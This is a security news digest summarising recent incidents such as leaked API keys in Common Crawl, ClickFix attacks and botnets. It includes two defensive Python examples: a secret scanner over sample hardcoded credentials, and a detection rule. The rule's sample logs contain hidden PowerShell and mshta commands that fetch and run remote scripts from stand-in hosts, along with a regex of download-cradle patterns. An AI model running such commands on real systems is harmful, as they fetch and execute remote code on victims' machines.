12,000 API Keys and Passwords Found in AI Training Datasets
Nearly 12,000 live API keys and passwords were discovered in Common Crawl, the public web archive widely used to build AI training datasets. Researchers at Truffle Security scanned roughly 400 terabytes of crawl data and identified 11,908 secrets that still authenticated successfully, most of them hardcoded in front-end code such as HTML and JavaScript. The exposed credentials include keys for services such as AWS and MailChimp, a significant risk for the enterprises that own them. The findings underscore the need to keep secrets out of client-side code and to filter sensitive data before it lands in publicly accessible training corpora. Read more
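The kind of scan Truffle Security ran reduces, at its core, to pattern-matching provider-specific key formats over crawled source text and then verifying each hit against the provider. The block below is an added example, not Truffle's tooling or the Common Crawl pipeline: it matches two of the named key formats (AWS access key IDs and MailChimp API keys) over a constructed front-end snippet and only reports a 40-character AWS secret when an access key ID sits within a few lines of it, which keeps base64 noise out of the results. The AWS values in the sample are the placeholder credentials from AWS's own documentation, and the MailChimp key is made up; the `window` parameter and the `redacted` preview format are choices made for this example.

```python
import re

# Added example: regex-based secret detection over source text. Patterns follow
# the providers' documented key shapes; nothing here contacts any API.
PATTERNS = {
    # AWS access key IDs: "AKIA" (long-term) or "ASIA" (temporary) + 16 chars.
    "aws_access_key_id": re.compile(r"\b(?:AKIA|ASIA)[A-Z0-9]{16}\b"),
    # AWS secret access keys: 40 base64-style characters. Only reported when an
    # access key ID was seen nearby (see scan_text) to limit false positives.
    "aws_secret_access_key": re.compile(
        r"(?<![A-Za-z0-9/+=])[A-Za-z0-9/+=]{40}(?![A-Za-z0-9/+=])"),
    # MailChimp API keys: 32 hex chars, a dash, then the data-centre suffix.
    "mailchimp_api_key": re.compile(r"\b[0-9a-f]{32}-us[0-9]{1,2}\b"),
}

# Constructed sample of front-end code with hardcoded credentials. The AWS
# values are the placeholders from AWS documentation; the MailChimp key is fake.
SAMPLE_FRONTEND_JS = "\n".join([
    "const s3 = new AWS.S3({",
    '  accessKeyId: "AKIAIOSFODNN7EXAMPLE",',
    '  secretAccessKey: "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",',
    "});",
    'const MC_KEY = "0123456789abcdef0123456789abcdef-us21";',
    "fetch(`https://us21.api.mailchimp.com/3.0/lists`, "
    "{ headers: { Authorization: `apikey ${MC_KEY}` } });",
])


def redact(value: str) -> str:
    """Keep enough of a secret to locate it in the source, never the whole thing."""
    return value[:4] + "..." + value[-4:]


def scan_text(text: str, window: int = 3) -> list[dict]:
    """Return findings as {kind, line, redacted, secret}, in source order.

    An AWS secret access key is only reported if an access key ID appeared on
    the same line or within `window` lines above it.
    """
    findings = []
    last_id_line = None
    for lineno, line in enumerate(text.splitlines(), start=1):
        for kind, pattern in PATTERNS.items():
            for match in pattern.finditer(line):
                if kind == "aws_secret_access_key" and (
                        last_id_line is None or lineno - last_id_line > window):
                    continue
                findings.append({
                    "kind": kind,
                    "line": lineno,
                    "redacted": redact(match.group(0)),
                    "secret": match.group(0),
                })
                if kind == "aws_access_key_id":
                    last_id_line = lineno
    return findings


if __name__ == "__main__":
    for f in scan_text(SAMPLE_FRONTEND_JS):
        print(f"line {f['line']}: {f['kind']} {f['redacted']}")
```

Detection alone yields candidates; what made the 11,908 figure meaningful is that each candidate was checked against the provider (for AWS, a call such as STS `GetCallerIdentity` with the pair). That verification step is deliberately left out here, since it should only ever be run against keys you are authorised to test.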
Open-Source Tool Rayhunter Helps Users Detect Stingray Attacks
The EFF launched Rayhunter, an open-source tool for detecting Stingray attacks, in which cell-site simulators (IMSI catchers) impersonate a legitimate tower to intercept sensitive data from nearby phones. Rayhunter captures the control-plane traffic between a mobile hotspot and the cell tower and analyzes it for suspicious events, without monitoring the user's own activity. It alerts users via visual indicators and logs data for further analysis. Designed to run on affordable mobile hotspots, Rayhunter aims to give users visibility into unauthorized interception of their mobile communications. Read more
Fake BianLian Ransom Notes Mailed to US CEOs in Postal Mail Scam
Scammers impersonating the BianLian group are mailing fake ransom notes to US CEOs, threatening to leak data unless a Bitcoin payment is made. The letters demand payment within 10 days, with ransom amounts ranging from $250,000 to $500,000. To add credibility, some notes included actual compromised passwords. Experts warn organizations to educate executives about such scams to prevent panic and misallocation of resources. Read more
BadBox Malware Disrupted on 500K Infected Android Devices
An operation against the BadBox malware, which targets low-cost Android devices, has disrupted over 500,000 infected units globally. Cybersecurity researchers had 24 malicious applications removed from Google Play and sinkholed the botnet's communication channels. The malware primarily infects cheap TV streaming boxes and smartphones, turning them into residential proxies for fraud and other abuse. The operation revealed significant infection counts in regions such as Brazil and the US, underscoring the risks of insecure, off-brand devices and the need for robust security measures. Read more
Silk Typhoon Hackers Now Target IT Supply Chains to Breach Networks
Silk Typhoon hackers have shifted tactics to exploit IT supply chains, targeting various industries, including government and healthcare. They compromise remote management tools to infiltrate networks, leveraging unpatched applications and stolen credentials. Microsoft reported that the group has been actively scanning GitHub repositories for leaked authentication keys and utilizing malware like PlugX for persistent access. This evolution in tactics highlights the increasing sophistication of cyberattacks aimed at critical infrastructure. Read more
YouTube Warns of AI-Generated Phishing Attacks Targeting Creators
YouTube issued a warning about phishing campaigns utilizing AI-generated videos of CEO Neal Mohan. Attackers distribute fake private videos claiming policy changes to steal creators’ credentials. The fraudulent video directs users to a malicious site disguised as a YouTube login page, threatening account restrictions if they fail to comply. YouTube advises users to avoid suspicious links and emphasizes that legitimate communications will never be sent through private videos. Read more
US Charges Chinese Hackers Targeting Critical Infrastructure Breaches
The US Justice Department indicted Chinese state security officers and hackers from APT27 and i-Soon for cyberattacks targeting critical infrastructure since 2011. The indictment details how these actors conducted intrusions directed by China’s Ministry of State Security, selling stolen data to government bureaus. The DOJ has offered rewards for information on ten individuals involved in this extensive hacking campaign, which exploited vulnerabilities and installed persistent malware, underscoring the ongoing threat to national security. Read more
Hunters International Claims Ransomware Attack on Tata Technologies: 1.4TB Data Breached
Hunters International claimed responsibility for a ransomware attack on Tata Technologies, stealing approximately 1.4 TB of data. The breach, reported in January 2025, involved 730,000 files but had minimal operational impact. Hunters have threatened to release the stolen data if their ransom demands are not met. The attack underscores ongoing risks from ransomware groups, particularly those with a history of high-profile breaches in various sectors, including government and defense. Read more
Black Basta and Cactus Ransomware: Shared Tactics and BackConnect Malware Connection
The Black Basta and Cactus ransomware groups share tactics and both use BackConnect malware for network infiltration. Both flood targets with email spam and then contact them while impersonating IT help desk staff to gain initial access. The malware acts as a proxy, allowing the attackers to mask their activity and escalate within the network undetected. This connection underscores the need for organizations to remain vigilant as these groups continue to adapt their methods. Read more
Cisco Warns of BroadWorks Flaw Exposing Credentials
Cisco has issued a warning about a vulnerability in Webex for BroadWorks that could allow an unauthenticated remote attacker to access sensitive credentials. The flaw affects Webex for BroadWorks deployments in which insecure transport is configured for SIP communication, allowing credentials to be read from the unencrypted traffic. Cisco has pushed a configuration fix; administrators are advised to restart the Cisco Webex app for it to take effect and to configure secure transport for SIP communication. Read more
Broadcom Fixes Three VMware Zero-Days Exploited in Attacks
Broadcom has addressed three critical VMware zero-day vulnerabilities that have been actively exploited, affecting products including ESXi, Workstation and Fusion. Tracked as CVE-2025-22224, CVE-2025-22225, and CVE-2025-22226, the flaws allow an attacker who already holds administrative privileges inside a guest VM to escape the virtual machine sandbox and reach the hypervisor. Organizations must apply the patches immediately, as exploitation poses significant risk, especially given the flaws' targeting by various hacking groups. Read more
Major Data Breach at Lost & Found Tracking Site Exposes Over 800,000 Records
A data breach at the German travel tracking firm Lost & Found has exposed over 800,000 records, including sensitive documents such as passport scans and driver's licenses. Discovered by security researcher Jeremiah Fowler, the unprotected, publicly accessible database contained 820,750 records totaling 122GB. The exposure raises significant identity theft concerns, as criminals could misuse the compromised personally identifiable information. Investigations are ongoing to determine the breach's extent and who is responsible. Read more
Polish Space Agency Suffers Cyberattack, Takes Systems Offline
The Polish Space Agency (POLSA) disconnected its systems following a cyberattack that compromised its email systems. The agency reported the incident to authorities and initiated an investigation while collaborating with national CSIRT teams. Although the specific nature of the attack remains undisclosed, the disruption emphasizes the critical role of email in operations and the potential risks to national infrastructure. Ongoing efforts are focused on identifying the perpetrators and restoring system functionality. Read more
New Polyglot Malware Targets Aviation and Satellite Communication Firms
A new malware strain named Sosano, delivered through polyglot files (files crafted to be valid in more than one format, so that a scanner parsing one format misses the payload carried in the other), has emerged targeting aviation and satellite communication firms in the UAE. Discovered by Proofpoint, the malware enables remote command execution and establishes persistence on infected devices. It spreads through spear-phishing emails that direct victims to malicious downloads, relying on the multi-format file trick to evade detection. Organizations are urged to strengthen their email and file inspection to counter this evolving threat. Read more
Eleven11bot: New Botnet Infects 86,000 Devices for DDoS Attacks
The Eleven11bot botnet has infected over 86,000 IoT devices, primarily targeting security cameras and NVRs for DDoS attacks. Discovered by Nokia, the botnet exploits weak admin credentials and scans for exposed ports. Attacks have reached millions of packets per second, affecting devices mainly in the US, UK, and other countries. Organizations are advised to block associated IP addresses and enhance their IoT security practices to mitigate this threat. Read more
Outsourcing Cybersecurity Could Save Your Company Millions
Outsourcing cybersecurity management presents numerous benefits, such as access to expertise, cost efficiency, and better threat prediction. External providers offer 24/7 support and continuous monitoring, allowing organizations to focus on core business functions. However, companies must weigh potential risks, including data security and control over security practices. A thorough evaluation of internal capabilities and potential providers is essential for making informed decisions regarding cybersecurity management. Read more
BianLian Ransomware: Shadow Data Extortion Group
The BianLian ransomware group has shifted from double extortion (encrypting systems and stealing data) to extortion based purely on data exfiltration, targeting critical infrastructure and private sector organizations. Likely based in Russia, the group gains access through RDP and phishing and threatens to publicly release stolen data unless a ransom is paid. Understanding BianLian's methods is crucial for organizations seeking to mitigate the risk posed by this threat actor. Read more
OnlyFans Cyberattacks: Fake CAPTCHAs and Malware Distribution Threaten Users
OnlyFans users are facing increasing phishing attacks that use fake Cloudflare CAPTCHA pages and malware-laden links. The fake verification step tricks users into running malicious scripts themselves, leading to keylogger and ransomware infections. The approach exploits users' trust in familiar verification prompts to harvest sensitive information. Organizations should pair robust email scanning with user education to counter these threats. Read more
Vo1d Botnet Surpasses 1.59 Million Infected Android TVs Across 226 Countries
The Vo1d botnet has infected over 1.59 million Android TV devices across 226 countries, according to researchers at XLab, with a notable surge in infections in India. At peak the botnet had roughly 800,000 daily active IP addresses, and its latest variant uses RSA encryption to protect its command-and-control traffic from inspection and takeover. Network defenders are urged to block the botnet's known infrastructure to mitigate the threat. Read more
ClickFix Attack Deploys Havoc C2 via Microsoft SharePoint
A new ClickFix attack abuses Microsoft SharePoint to deploy the Havoc post-exploitation framework, tricking users into executing malicious PowerShell commands themselves. The phishing campaign uses emails with an HTML attachment that displays a fake error message and prompts the user to click for a fix. That click copies a harmful PowerShell command to the clipboard; once the victim pastes and runs it, a script is fetched from an attacker-controlled SharePoint site. The Havoc framework then gives the attackers persistent control over the compromised device for further malicious activity. Read more
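The detection angle on ClickFix is the process lineage: the victim pastes the command into the Run dialog or a console launched from the desktop shell, so the script host is a child of explorer.exe and its command line carries a download cradle pointing at a remote host. The block below is an added example, not code from the campaign write-up or from Havoc: it triages constructed Sysmon-style process-creation records with that rule and calls out payloads served from a sharepoint.com host, since a trusted domain does not mean a trusted tenant. The parent-process assumption (explorer.exe for Run-dialog launches), the marker list and the sample records, including the fake tenant URL, are choices made for this example.

```python
import ntpath
import re
from urllib.parse import urlparse

# Constructed Sysmon Event ID 1 style records (only the fields the rule uses).
SAMPLE_EVENTS = [
    {"id": 1, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\rotate-logs.ps1"},
    {"id": 2, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden -c \"iex (iwr "
                    "'https://example-my.sharepoint.com/personal/u_example_com/Documents/fix.txt'"
                    " -UseBasicParsing).Content\""},
    {"id": 3, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell"},  # user simply opened a console: no cradle
    {"id": 4, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://example.invalid/verify.hta"},
]

# Assumption for this example: Run-dialog and desktop launches show explorer.exe
# as the parent. Script hosts commonly named in ClickFix lures are listed below.
INTERACTIVE_PARENTS = {"explorer.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe"}

# Download cradles and hiding/encoding switches seen in pasted one-liners.
CRADLE = re.compile(
    r"\b(?:iex|invoke-expression|iwr|invoke-webrequest|invoke-restmethod|"
    r"downloadstring|start-bitstransfer|curl|wget)\b"
    r"|-enc(?:odedcommand)?\b"
    r"|-w(?:indowstyle)?\s+hidden",
    re.IGNORECASE,
)
URL_RE = re.compile(r"https?://[^\s'\"<>)]+")


def triage(events: list[dict]) -> list[dict]:
    """Return {id, reasons} for records matching the ClickFix lineage pattern."""
    hits = []
    for ev in events:
        parent = ntpath.basename(ev["ParentImage"]).lower()
        image = ntpath.basename(ev["Image"]).lower()
        cmd = ev["CommandLine"]
        if parent not in INTERACTIVE_PARENTS or image not in SCRIPT_HOSTS:
            continue
        reasons = []
        markers = sorted({m.group(0).lower() for m in CRADLE.finditer(cmd)})
        if markers:
            reasons.append("cradle/obfuscation markers: " + ", ".join(markers))
        for url in URL_RE.findall(cmd):
            host = urlparse(url).hostname or ""
            reasons.append(f"remote URL host: {host}")
            if host.endswith(".sharepoint.com"):
                reasons.append("payload on sharepoint.com: trusted domain, "
                               "tenant may be attacker-controlled")
        if reasons:
            reasons.insert(0, f"{image} launched from {parent}")
            hits.append({"id": ev["id"], "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit["id"], "; ".join(hit["reasons"]))
```

Record 3 is the false-positive guard: a plain console launched from the desktop has the right lineage but no cradle or URL, so it is left alone. In a real deployment the same rule can be cross-checked against the RunMRU registry key, which retains what was typed into the Run dialog.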
CISA Tags Windows and Cisco Vulnerabilities as Actively Exploited
CISA has added two vulnerabilities in Cisco and Windows products to its Known Exploited Vulnerabilities catalog after confirming active exploitation. They are CVE-2023-20118, a command-injection flaw in the web management interface of end-of-life Cisco RV-series VPN routers that allows arbitrary command execution, and CVE-2018-8639, a Win32k privilege-escalation flaw affecting Windows. Federal agencies are mandated to secure their networks by March 23, 2025. Cisco's advisory, which also covers the related authentication bypass CVE-2023-20025, notes that proof-of-concept exploit code is publicly available and that the affected routers will not receive a fix, so replacing or isolating them is the only durable mitigation. Read more
Trinity Ransomware: The Enigma of the .trinitylock
Trinity ransomware, first observed in May 2024, employs a double extortion model, exfiltrating data before encryption. Utilizing the ChaCha20 encryption algorithm, it appends the “.trinitylock” extension to encrypted files. The group has targeted healthcare entities in the US and UK, claiming access to sensitive data. Their operations include a victim support site and a data leak site, increasing pressure on victims to pay ransoms. The ransom notes provide communication details and a 24-hour deadline for responses. Read more